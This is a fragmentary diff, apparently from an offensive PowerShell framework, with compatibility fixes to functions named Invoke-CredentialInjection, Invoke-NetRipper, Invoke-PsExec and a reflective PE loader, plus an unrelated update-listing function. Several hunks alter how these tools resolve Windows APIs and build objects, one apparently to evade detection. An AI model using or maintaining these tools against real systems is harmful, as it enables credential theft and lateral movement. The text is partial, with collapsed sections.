$tmpPtr = New-Object IntPtr
......
......@@ -275,7 +275,7 @@ http://www.exploit-monday.com
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
Function Get-WinUpdates
{
<#
.SYNOPSIS
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer.
.DESCRIPTION
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer. Requires administrative level access.
.PARAMETER ComputerName
A description of the ComputerName parameter.
.EXAMPLE
Get-WinUpdates -ComputerName "localhost"
.EXAMPLE
Get-Content computers.txt | Get-WinUpdates | Format-Table PC,Date,Operation,Status,Title,KB,PC -Wrap -auto
.NOTES
Get-WinUpdates gets a list of Windows and Microsoft Updates installed on the computer.
Based on Get-InstalledUpdates https://github.com/Kreloc
M.Hartsuijker - Classity - Modified to include pending updates
#>
[CmdletBinding()]
Param (
[Parameter(position=0,Mandatory = $False,ValueFromPipeline =
$true,ValueFromPipelinebyPropertyName=$true)][Alias('Name')]
$ComputerName = $env:computername
)
Begin
{
function Test-ElevatedShell
{
$user = [Security.Principal.WindowsIdentity]::GetCurrent()
(New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)
}
$admin = Test-ElevatedShell
}
PROCESS
{
If($admin)
{
[System.Reflection.Assembly]::LoadWithPartialName('Microsoft.Update.Session') | Out-Null
$Session = [activator]::CreateInstance([type]::GetTypeFromProgID("Microsoft.Update.Session",$ComputerName))
$Searcher = $Session.CreateUpdateSearcher()
$historyCount = $Searcher.GetTotalHistoryCount()
$Searcher.QueryHistory(0, $historyCount) | Select-Object Date,
@{name="Operation"; expression={switch($_.operation){
1 {"Installation"}; 2 {"Uninstallation"}; 3 {"Other"}}}},
@{name="Status"; expression={switch($_.resultcode){
0 {"Not started"}; 1 {"In Progress"}; 2 {"Succeeded"}; 3 {"Succeeded With Errors"};
4 {"Failed"}; 5 {"Aborted"}
}}}, Title,@{name="KB"; expression={($_.title -split "(KB*.*)")[1]}},@{name="PC";expression={$ComputerName}}
$Updates = @($Searcher.Search("IsHidden=0 and IsInstalled=0").Updates)
$Updates | Select-Object @{name="Date";expression={"Blank"}},@{name="Operation";expression={"Other"}},@{name="Status";expression={"Pending"}},Title,@{name="PC";expression={$ComputerName}}
}
else
{
"Please re-load this function in a Run as Administrator PowerShell console."
}
}
}
This diff is collapsed.
......@@ -167,7 +167,7 @@ function Invoke-NetRipper {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -911,7 +911,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -1119,7 +1119,7 @@ function Invoke-CredentialInjection
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......@@ -3021,7 +3021,7 @@ function Invoke-CredentialInjection
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -1307,7 +1307,7 @@ Param(
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......@@ -2605,7 +2605,7 @@ Param(
$PEInfo = Get-PEBasicInfo -PEBytes $PEBytes -Win32Types $Win32Types
$OriginalImageBase = $PEInfo.OriginalImageBase
$NXCompatible = $true
if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_NX_COMPAT)
{
Write-Warning "PE is not compatible with DEP, might cause issues" -WarningAction Continue
$NXCompatible = $false
......@@ -2663,7 +2663,7 @@ Param(
#Write-Verbose "Allocating memory for the PE and write its headers to memory"
[IntPtr]$LoadAddr = [IntPtr]::Zero
if (($PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
if (([Int] $PEInfo.DllCharacteristics -band $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE) -ne $Win32Constants.IMAGE_DLLCHARACTERISTICS_DYNAMIC_BASE)
{
Write-Warning "PE file being reflectively loaded is not ASLR compatible. If the loading fails, try restarting PowerShell and trying again" -WarningAction Continue
[IntPtr]$LoadAddr = $OriginalImageBase
This diff is collapsed.
......@@ -864,7 +864,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
[Switch]
$Raw
)
<#
DynamicParam {
$UACValueNames = [Enum]::GetNames($UACEnum)
# add in the negations
......@@ -872,7 +872,7 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
# create new dynamic parameter
New-DynamicParameter -Name UACFilter -ValidateSet $UACValueNames -Type ([array])
}
#>
BEGIN {
$SearcherArguments = @{}
if ($PSBoundParameters['Domain']) { $SearcherArguments['Domain'] = $Domain }
......@@ -890,9 +890,9 @@ The raw DirectoryServices.SearchResult object, if -Raw is enabled.
PROCESS {
#bind dynamic parameter to a friendly variable
if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
}
#if ($PSBoundParameters -and ($PSBoundParameters.Count -ne 0)) {
# New-DynamicParameter -CreateVariables -BoundParameters $PSBoundParameters
#}
if ($UserSearcher) {
$IdentityFilter = ''
......
......@@ -292,7 +292,7 @@ Blog on this script: http://clymb3r.wordpress.com/2013/11/03/powershell-and-toke
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -158,7 +158,7 @@ function Invoke-PsExec {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
......@@ -483,7 +483,8 @@ $RemoteScriptBlock = {
Function Get-Win32Constants
{
$Win32Constants = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Constants = $Creator.CreateObject('System.Object','')
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_COMMIT -Value 0x00001000
$Win32Constants | Add-Member -MemberType NoteProperty -Name MEM_RESERVE -Value 0x00002000
......@@ -520,7 +521,8 @@ $RemoteScriptBlock = {
Function Get-Win32Functions
{
$Win32Functions = New-Object System.Object
$Creator = New-Object -ComObject RDS.DataSpace
$Win32Functions = $Creator.CreateObject('System.Object','')
$VirtualAllocAddr = Get-ProcAddress kernel32.dll VirtualAlloc
$VirtualAllocDelegate = Get-DelegateType @([IntPtr], [UIntPtr], [UInt32], [UInt32]) ([IntPtr])
......@@ -930,7 +932,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))
# Get a handle to the module specified
$Kern32Handle = $GetModuleHandle.Invoke($null, @($Module))
$tmpPtr = New-Object IntPtr
......
This diff is collapsed.
......@@ -1038,7 +1038,7 @@ $RemoteScriptBlock = {
$UnsafeNativeMethods = $SystemAssembly.GetType('Microsoft.Win32.UnsafeNativeMethods')
# Get a reference to the GetModuleHandle and GetProcAddress methods
$GetModuleHandle = $UnsafeNativeMethods.GetMethod('GetModuleHandle')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress')
$GetProcAddress = $UnsafeNativeMethods.GetMethod('GetProcAddress', [Type[]]@([System.Runtime.InteropServices.HandleRef], [String]))